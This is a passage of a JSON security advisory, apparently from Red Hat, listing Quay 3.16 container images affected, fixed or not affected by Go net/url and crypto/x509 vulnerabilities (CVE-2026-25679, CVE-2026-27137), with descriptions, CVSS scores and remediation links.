            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "jsrsasign: jsrsasign: Signature verification bypass via negative exponent handling"
    },
    {
      "cve": "CVE-2026-25679",
      "cwe": {
        "id": "CWE-1286",
        "name": "Improper Validation of Syntactic Correctness of Input"
      },
      "discovery_date": "2026-03-06T22:02:11.567841+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445356"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "net/url: Incorrect parsing of IPv6 host literals in net/url",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445356",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/752180",
          "url": "https://go.dev/cl/752180"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/77578",
          "url": "https://go.dev/issue/77578"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
          "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4601",
          "url": "https://pkg.go.dev/vuln/GO-2026-4601"
        }
      ],
      "release_date": "2026-03-06T21:28:14.211000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"
    },
    {
      "cve": "CVE-2026-27137",
      "cwe": {
        "id": "CWE-295",
        "name": "Improper Certificate Validation"
      },
      "discovery_date": "2026-03-06T22:01:38.859733+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445345"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A certificate validation flaw has been discovered in the golang crypto/x509 module. When verifying a certificate chain which contains a certificate containing multiple email address constraints which share common local portions but different domain portions, these constraints will not be properly applied, and only the last constraint will be considered.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: Incorrect enforcement of email constraints in crypto/x509",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
